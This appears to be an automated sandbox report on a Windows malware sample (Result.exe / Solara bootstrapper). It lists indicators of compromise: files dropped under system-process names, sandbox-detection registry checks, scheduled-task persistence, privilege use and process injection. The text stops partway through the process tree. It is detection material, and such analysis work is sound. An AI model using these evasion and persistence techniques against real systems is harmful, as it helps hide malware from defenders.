C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\lib\get-node-modules.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\models\key.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\git\lib\is.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-hook.1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\git\lib\utils.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\events\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\installed-package-contents\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\socks\typings\client\socksclient.d.ts msiexec.exe File created C:\Program Files\nodejs\nodevars.bat msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\ping.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\npm-audit-report\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\types\sigstore\__generated__\sigstore_verification.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\lib\render-template.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\classes\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmfund\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-prune.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\lib\get-prefix.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\http-proxy-agent\dist\agent.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\place-dep.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\imurmurhash\imurmurhash.min.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\color-convert\conversions.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\columnify\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\models\role.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\lib\_stream_readable.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\README.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\arborist\deduper.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\diff\dist\diff.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\utils\did-you-mean.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\socks-proxy-agent\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\are-we-there-yet\lib\tracker.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\qrcode-terminal\vendor\QRCode\QRMode.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\cli-columns\test.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-root.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\fastest-levenshtein\esm\mod.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\fs-minipass\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\config\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\color-convert\LICENSE msiexec.exe -
Drops file in Windows directory 27 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI7040.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE321.tmp msiexec.exe File created C:\Windows\Installer\e57e785.msi msiexec.exe File created C:\Windows\LiveKernelReports\a0b1fd4c5438e9 Refcrt.exe File opened for modification C:\Windows\Installer\MSIE95.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFB0.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIE506.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2EC.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC} msiexec.exe File opened for modification C:\Windows\Installer\MSI6FE2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE2A3.tmp msiexec.exe File opened for modification C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon msiexec.exe File opened for modification C:\Windows\Installer\MSIF2AF.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIF260.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\ServiceState\SEMgrSvc\spoolsv.exe Refcrt.exe File created C:\Windows\LiveKernelReports\Refcrt.exe Refcrt.exe File opened for modification C:\Windows\Installer\e57e781.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIEB22.tmp msiexec.exe File created C:\Windows\Vss\RuntimeBroker.exe Refcrt.exe File opened for modification C:\Windows\Installer\MSIF1E2.tmp msiexec.exe File created C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon msiexec.exe File created C:\Windows\Vss\9e8d7a4ca61bd9 Refcrt.exe File created C:\Windows\Installer\e57e781.msi msiexec.exe File created C:\Windows\WinSxS\csrss.exe Refcrt.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Modifies data under HKEY_USERS 21 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe -
Modifies registry class 33 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\5B532AFE1A6C6E24B99C208A5DF6C1CD msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Language = "1033" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNpmModules = "EnvironmentPath" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-464762018-485119342-1613148473-1000\{31857B55-8F06-438C-8E19-16DF15DAE2E2} msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\DocumentationShortcuts msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\npm msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeRuntime msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\PackageName = "node-v18.16.0-x64.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeEtwSupport = "NodeRuntime" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings sppsvc.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNode = "EnvironmentPath" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductName = "Node.js" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\PackageCode = "347C7A52EDBDC9A498427C0BC7ABB536" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Version = "303038464" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductIcon = "C:\\Windows\\Installer\\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\\NodeIcon" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\corepack msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPath msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000_Classes\Local Settings solara.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 45 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 596 schtasks.exe 2548 schtasks.exe 4696 schtasks.exe 2436 schtasks.exe 1376 schtasks.exe 3608 schtasks.exe 4312 schtasks.exe 3096 schtasks.exe 4088 schtasks.exe 4760 schtasks.exe 1420 schtasks.exe 3304 schtasks.exe 3984 schtasks.exe 2832 schtasks.exe 3364 schtasks.exe 1632 schtasks.exe 2408 schtasks.exe 1328 schtasks.exe 208 schtasks.exe 1580 schtasks.exe 2116 schtasks.exe 1784 schtasks.exe 1880 schtasks.exe 2848 schtasks.exe 2176 schtasks.exe 440 schtasks.exe 3512 schtasks.exe 512 schtasks.exe 1184 schtasks.exe 3356 schtasks.exe 4092 schtasks.exe 948 schtasks.exe 1548 schtasks.exe 1948 schtasks.exe 4112 schtasks.exe 4816 schtasks.exe 4316 schtasks.exe 4764 schtasks.exe 2756 schtasks.exe 1544 schtasks.exe 2280 schtasks.exe 1020 schtasks.exe 4820 schtasks.exe 2036 schtasks.exe 796 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1168 SolaraBootstrapper.exe 1168 SolaraBootstrapper.exe 4956 Refcrt.exe 4956 Refcrt.exe 4956 Refcrt.exe 4956 Refcrt.exe 3256 powershell.exe 3256 powershell.exe 3088 powershell.exe 3088 powershell.exe 3832 powershell.exe 3832 powershell.exe 4344 powershell.exe 4344 powershell.exe 3656 powershell.exe 3656 powershell.exe 2860 powershell.exe 2860 powershell.exe 1456 powershell.exe 3424 powershell.exe 3424 powershell.exe 3256 powershell.exe 1456 powershell.exe 4508 powershell.exe 4508 powershell.exe 4708 powershell.exe 4708 powershell.exe 4324 powershell.exe 4324 powershell.exe 3224 powershell.exe 3224 powershell.exe 540 powershell.exe 540 powershell.exe 4340 powershell.exe 4340 powershell.exe 100 powershell.exe 100 powershell.exe 540 powershell.exe 4340 powershell.exe 3048 sppsvc.exe 3048 sppsvc.exe 3088 powershell.exe 3656 powershell.exe 3832 powershell.exe 3832 powershell.exe 4344 powershell.exe 2860 powershell.exe 1456 powershell.exe 3424 powershell.exe 4508 powershell.exe 4708 powershell.exe 100 powershell.exe 4324 powershell.exe 3224 powershell.exe 3048 sppsvc.exe 3048 sppsvc.exe 3048 sppsvc.exe 3048 sppsvc.exe 3048 sppsvc.exe 3048 sppsvc.exe 3048 sppsvc.exe 3048 sppsvc.exe 3048 sppsvc.exe 2796 msiexec.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3048 sppsvc.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
pid Process 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1168 SolaraBootstrapper.exe Token: SeDebugPrivilege 4956 Refcrt.exe Token: SeDebugPrivilege 3256 powershell.exe Token: SeDebugPrivilege 3088 powershell.exe Token: SeDebugPrivilege 3832 powershell.exe Token: SeDebugPrivilege 4344 powershell.exe Token: SeDebugPrivilege 3656 powershell.exe Token: SeDebugPrivilege 2860 powershell.exe Token: SeDebugPrivilege 1456 powershell.exe Token: SeDebugPrivilege 3424 powershell.exe Token: SeDebugPrivilege 4508 powershell.exe Token: SeDebugPrivilege 4340 powershell.exe Token: SeDebugPrivilege 100 powershell.exe Token: SeDebugPrivilege 540 powershell.exe Token: SeDebugPrivilege 4324 powershell.exe Token: SeDebugPrivilege 4708 powershell.exe Token: SeDebugPrivilege 3224 powershell.exe Token: SeDebugPrivilege 3048 sppsvc.exe Token: SeShutdownPrivilege 852 msiexec.exe Token: SeIncreaseQuotaPrivilege 852 msiexec.exe Token: SeSecurityPrivilege 2796 msiexec.exe Token: SeCreateTokenPrivilege 852 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 852 msiexec.exe Token: SeLockMemoryPrivilege 852 msiexec.exe Token: SeIncreaseQuotaPrivilege 852 msiexec.exe Token: SeMachineAccountPrivilege 852 msiexec.exe Token: SeTcbPrivilege 852 msiexec.exe Token: SeSecurityPrivilege 852 msiexec.exe Token: SeTakeOwnershipPrivilege 852 msiexec.exe Token: SeLoadDriverPrivilege 852 msiexec.exe Token: SeSystemProfilePrivilege 852 msiexec.exe Token: SeSystemtimePrivilege 852 msiexec.exe Token: SeProfSingleProcessPrivilege 852 msiexec.exe Token: SeIncBasePriorityPrivilege 852 msiexec.exe Token: SeCreatePagefilePrivilege 852 msiexec.exe Token: SeCreatePermanentPrivilege 852 msiexec.exe Token: SeBackupPrivilege 852 msiexec.exe Token: SeRestorePrivilege 852 msiexec.exe Token: SeShutdownPrivilege 852 msiexec.exe Token: SeDebugPrivilege 852 msiexec.exe Token: SeAuditPrivilege 852 msiexec.exe Token: SeSystemEnvironmentPrivilege 852 msiexec.exe Token: SeChangeNotifyPrivilege 852 msiexec.exe Token: SeRemoteShutdownPrivilege 852 msiexec.exe Token: SeUndockPrivilege 852 msiexec.exe Token: SeSyncAgentPrivilege 852 msiexec.exe Token: SeEnableDelegationPrivilege 852 msiexec.exe Token: SeManageVolumePrivilege 852 msiexec.exe Token: SeImpersonatePrivilege 852 msiexec.exe Token: SeCreateGlobalPrivilege 852 msiexec.exe Token: SeRestorePrivilege 2796 msiexec.exe Token: SeTakeOwnershipPrivilege 2796 msiexec.exe Token: SeRestorePrivilege 2796 msiexec.exe Token: SeTakeOwnershipPrivilege 2796 msiexec.exe Token: SeRestorePrivilege 2796 msiexec.exe Token: SeTakeOwnershipPrivilege 2796 msiexec.exe Token: SeRestorePrivilege 2796 msiexec.exe Token: SeTakeOwnershipPrivilege 2796 msiexec.exe Token: SeRestorePrivilege 2796 msiexec.exe Token: SeTakeOwnershipPrivilege 2796 msiexec.exe Token: SeRestorePrivilege 2796 msiexec.exe Token: SeTakeOwnershipPrivilege 2796 msiexec.exe Token: SeRestorePrivilege 2796 msiexec.exe Token: SeTakeOwnershipPrivilege 2796 msiexec.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 6140 chrome.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe 5436 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1576 wrote to memory of 1168 1576 Result.exe 86 PID 1576 wrote to memory of 1168 1576 Result.exe 86 PID 1576 wrote to memory of 1168 1576 Result.exe 86 PID 1576 wrote to memory of 4528 1576 Result.exe 88 PID 1576 wrote to memory of 4528 1576 Result.exe 88 PID 1576 wrote to memory of 4528 1576 Result.exe 88 PID 4528 wrote to memory of 3412 4528 solara.exe 89 PID 4528 wrote to memory of 3412 4528 solara.exe 89 PID 4528 wrote to memory of 3412 4528 solara.exe 89 PID 3412 wrote to memory of 4544 3412 WScript.exe 90 PID 3412 wrote to memory of 4544 3412 WScript.exe 90 PID 3412 wrote to memory of 4544 3412 WScript.exe 90 PID 4544 wrote to memory of 4956 4544 cmd.exe 92 PID 4544 wrote to memory of 4956 4544 cmd.exe 92 PID 4956 wrote to memory of 3224 4956 Refcrt.exe 139 PID 4956 wrote to memory of 3224 4956 Refcrt.exe 139 PID 4956 wrote to memory of 4708 4956 Refcrt.exe 140 PID 4956 wrote to memory of 4708 4956 Refcrt.exe 140 PID 4956 wrote to memory of 540 4956 Refcrt.exe 141 PID 4956 wrote to memory of 540 4956 Refcrt.exe 141 PID 4956 wrote to memory of 4372 4956 Refcrt.exe 142 PID 4956 wrote to memory of 4372 4956 Refcrt.exe 142 PID 4956 wrote to memory of 4324 4956 Refcrt.exe 143 PID 4956 wrote to memory of 4324 4956 Refcrt.exe 143 PID 4956 wrote to memory of 4344 4956 Refcrt.exe 144 PID 4956 wrote to memory of 4344 4956 Refcrt.exe 144 PID 4956 wrote to memory of 4508 4956 Refcrt.exe 145 PID 4956 wrote to memory of 4508 4956 Refcrt.exe 145 PID 4956 wrote to memory of 4340 4956 Refcrt.exe 146 PID 4956 wrote to memory of 4340 4956 Refcrt.exe 146 PID 4956 wrote to memory of 2860 4956 Refcrt.exe 147 PID 4956 wrote to memory of 2860 4956 Refcrt.exe 147 PID 4956 wrote to memory of 3832 4956 Refcrt.exe 148 PID 4956 wrote to memory of 3832 4956 Refcrt.exe 148 PID 4956 wrote to memory of 3656 4956 Refcrt.exe 149 PID 4956 wrote to memory of 3656 4956 Refcrt.exe 149 PID 4956 wrote to memory of 1456 4956 Refcrt.exe 150 PID 4956 wrote to memory of 1456 4956 Refcrt.exe 150 PID 4956 wrote to memory of 3088 4956 Refcrt.exe 151 PID 4956 wrote to memory of 3088 4956 Refcrt.exe 151 PID 4956 wrote to memory of 100 4956 Refcrt.exe 152 PID 4956 wrote to memory of 100 4956 Refcrt.exe 152 PID 4956 wrote to memory of 3424 4956 Refcrt.exe 153 PID 4956 wrote to memory of 3424 4956 Refcrt.exe 153 PID 4956 wrote to memory of 3256 4956 Refcrt.exe 154 PID 4956 wrote to memory of 3256 4956 Refcrt.exe 154 PID 4956 wrote to memory of 3048 4956 Refcrt.exe 171 PID 4956 wrote to memory of 3048 4956 Refcrt.exe 171 PID 1168 wrote to memory of 852 1168 SolaraBootstrapper.exe 172 PID 1168 wrote to memory of 852 1168 SolaraBootstrapper.exe 172 PID 1168 wrote to memory of 852 1168 SolaraBootstrapper.exe 172 PID 2796 wrote to memory of 5708 2796 msiexec.exe 175 PID 2796 wrote to memory of 5708 2796 msiexec.exe 175 PID 2796 wrote to memory of 5784 2796 msiexec.exe 176 PID 2796 wrote to memory of 5784 2796 msiexec.exe 176 PID 2796 wrote to memory of 5784 2796 msiexec.exe 176 PID 6140 wrote to memory of 5244 6140 chrome.exe 180 PID 6140 wrote to memory of 5244 6140 chrome.exe 180 PID 6140 wrote to memory of 2548 6140 chrome.exe 181 PID 6140 wrote to memory of 2548 6140 chrome.exe 181 PID 6140 wrote to memory of 2548 6140 chrome.exe 181 PID 6140 wrote to memory of 2548 6140 chrome.exe 181 PID 6140 wrote to memory of 2548 6140 chrome.exe 181 PID 6140 wrote to memory of 2548 6140 chrome.exe 181 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Result.exe"C:\Users\Admin\AppData\Local\Temp\Result.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\SysWOW64\msiexec.exe"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn3⤵
- Suspicious use of AdjustPrivilegeToken
PID:852
-
-
C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe"C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" /install /quiet /norestart3⤵
- Executes dropped EXE
PID:3192 -
